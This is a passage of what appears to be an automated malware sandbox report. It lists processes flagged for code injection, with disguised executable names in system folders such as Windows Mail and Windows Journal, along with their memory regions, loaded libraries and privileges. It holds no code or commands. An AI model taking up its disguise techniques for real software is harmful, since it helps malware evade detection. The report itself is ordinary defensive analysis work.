"pagefile_0x0000000000960000" filename = "" Region: id = 3772 start_va = 0xaf0000 end_va = 0xbabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 3773 start_va = 0xc30000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 3774 start_va = 0xc60000 end_va = 0xc76fff monitored = 0 entry_point = 0xc614a1 region_type = mapped_file name = "operamail.exe" filename = "\\Program Files (x86)\\Microsoft.NET\\operamail.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\operamail.exe") Region: id = 3775 start_va = 0xc80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 3776 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 3777 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3778 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3779 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3780 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3781 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3782 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3783 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3784 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3785 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3786 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3787 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3788 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3789 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3790 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3791 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3792 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3793 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3794 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3795 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3796 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3797 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3798 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3799 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3800 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3801 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3802 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 223 os_tid = 0x12b0 Thread: id = 224 os_tid = 0x1160 Process: id = "51" image_name = "ncftp.exe" filename = "c:\\program files\\windows journal\\ncftp.exe" page_root = "0xf58c000" os_pid = "0x1184" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Journal\\ncftp.exe\" " cur_dir = "C:\\Program Files\\Windows Journal\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4187 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4188 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4189 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4190 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4191 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4192 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4193 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4194 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4195 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4196 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4197 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4198 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4199 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4200 start_va = 0x4b0000 end_va = 0x56dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4201 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4202 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 4203 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 4204 start_va = 0xac0000 end_va = 0xad6fff monitored = 0 entry_point = 0xac14a1 region_type = mapped_file name = "ncftp.exe" filename = "\\Program Files\\Windows Journal\\ncftp.exe" (normalized: "c:\\program files\\windows journal\\ncftp.exe") Region: id = 4205 start_va = 0xae0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 4206 start_va = 0x1ee0000 end_va = 0x1f9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 4207 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 4208 start_va = 0x20d0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 4209 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4210 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4211 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4212 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4213 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4214 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4215 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4216 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4217 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4218 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4219 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4220 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4221 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4222 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4223 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4224 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4225 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4226 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4227 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4228 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4229 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4230 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4231 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4232 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4233 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4234 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 225 os_tid = 0x1254 Thread: id = 226 os_tid = 0x1188 Process: id = "52" image_name = "accupos.exe" filename = "c:\\program files (x86)\\windows mail\\accupos.exe" page_root = "0x11d7d000" os_pid = "0x11fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Mail\\accupos.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Mail\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 227 os_tid = 0x12d0 Thread: id = 228 os_tid = 0x1200 Process: id = "53" image_name = "winscp.exe" filename = "c:\\program files\\windows mail\\winscp.exe" page_root = "0x1b99e000" os_pid = "0x119c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Mail\\winscp.exe\" " cur_dir = "C:\\Program Files\\Windows Mail\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4667 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4668 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4669 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4670 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4671 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4672 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4673 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4674 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4675 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4676 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4677 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4678 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4679 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4680 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4681 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4682 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4683 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 4684 start_va = 0xac0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 4685 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 4686 start_va = 0xb40000 end_va = 0xbfbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 4687 start_va = 0x11a0000 end_va = 0x11b6fff monitored = 0 entry_point = 0x11a14a1 region_type = mapped_file name = "winscp.exe" filename = "\\Program Files\\Windows Mail\\winscp.exe" (normalized: "c:\\program files\\windows mail\\winscp.exe") Region: id = 4688 start_va = 0x11c0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 4689 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4690 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4691 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4692 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4693 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4694 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4695 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4696 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4697 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4698 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4699 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4700 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4701 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4702 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4703 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4704 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4705 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4706 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4707 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4708 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4709 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4710 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4711 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4712 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4713 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4714 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 229 os_tid = 0x129c Thread: id = 230 os_tid = 0x11a0 Process: id = "54" image_name = 